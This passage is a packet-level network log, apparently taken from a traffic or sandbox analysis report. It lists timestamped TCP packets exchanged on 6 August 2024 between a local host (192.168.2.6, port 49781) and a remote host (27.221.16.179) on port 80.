                                                                                                                                    Aug 6, 2024 10:30:42.108305931 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108306885 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108314991 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108318090 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108329058 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108339071 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108345032 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108356953 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108397007 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108397007 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108405113 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108414888 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108426094 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108436108 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108447075 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108457088 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108467102 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108474970 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108477116 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108495951 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108505964 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108520031 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108581066 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108592033 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108602047 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108607054 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108613014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108623028 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108633041 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108644009 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108645916 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108654022 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108659983 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108664989 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108675957 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108726025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108736992 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108747005 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108748913 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108757019 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108767986 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108778000 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108782053 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108782053 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108788967 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108798981 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108814955 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108824968 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108834982 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108841896 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108844995 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108855963 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108863115 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108864069 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108866930 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108884096 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108894110 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108897924 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108903885 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108915091 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108925104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108927011 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108936071 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.108944893 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.108962059 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109038115 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109146118 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109158039 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109168053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109178066 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109277964 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109306097 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109316111 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109325886 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109335899 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109345913 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109357119 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109359980 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109366894 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109370947 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109379053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109390974 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109395027 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109405994 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109415054 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109421015 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109426022 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109436035 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109438896 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109447002 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109457970 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109457016 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109467983 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109477997 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109488010 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109488964 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109498024 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109502077 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109508991 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109519005 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109522104 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109530926 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109540939 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.109543085 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109561920 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.109653950 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306046963 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306065083 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306077003 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306087971 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306102037 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306153059 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306199074 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306298018 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306318998 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306329966 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306349039 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306384087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306440115 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306452990 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306463003 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306473017 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306478977 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306483984 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306489944 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306529999 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306579113 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306590080 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306602001 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306608915 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306612968 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306623936 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306634903 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306638956 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306684017 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306684017 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306684971 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306696892 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306708097 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306718111 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306727886 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306745052 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306746006 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306757927 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306770086 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.306778908 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306794882 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.306942940 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307013988 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307024002 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307034969 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307046890 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307101965 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307101965 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307117939 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307233095 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307243109 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307255030 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307264090 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307275057 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307286024 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307291031 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307297945 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307307959 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307307959 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307320118 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307329893 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307341099 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307352066 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307379007 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307379007 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307431936 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307441950 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307452917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307462931 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307475090 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307486057 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307497025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.307542086 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.307542086 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308298111 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308327913 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308339119 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308360100 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308376074 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308412075 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308423042 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308434010 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308444977 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308475971 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308523893 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308533907 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308545113 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308549881 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308557034 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308573961 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308584929 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308595896 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308598995 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308598995 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308607101 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308656931 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308656931 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308711052 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308722019 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308732033 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308743000 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308753014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308763981 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308769941 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308774948 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308790922 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308795929 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308804035 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308813095 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308815002 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308823109 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308828115 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308835030 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308845043 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308870077 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308871984 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308882952 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308893919 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308900118 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308904886 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.308912039 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.308960915 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309011936 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309022903 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309032917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309048891 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309060097 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309070110 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309079885 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309079885 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309098005 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309108973 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309118032 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309118986 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309129000 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309139967 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309142113 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309158087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309176922 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309187889 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309200048 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309201956 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309211969 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309221983 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309231043 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309623003 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309675932 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309688091 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309703112 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309716940 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309727907 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309740067 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.309742928 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.309863091 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.366110086 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.656907082 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.656965017 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.656975985 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.656982899 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.656989098 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.656995058 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657001972 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657056093 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657068968 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657079935 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657109022 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657120943 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657119036 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657135963 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657201052 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657201052 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657232046 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657244921 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657268047 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657279968 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657289982 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657298088 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657300949 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657310963 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657321930 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657325029 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657332897 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657336950 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657346010 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657357931 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657358885 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657368898 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657386065 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657393932 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657396078 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657407045 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657417059 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657418966 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657428026 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657443047 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:42.657474041 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657485962 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657495022 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657509089 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:42.657521963 CEST4978180192.168.2.627.221.16.179
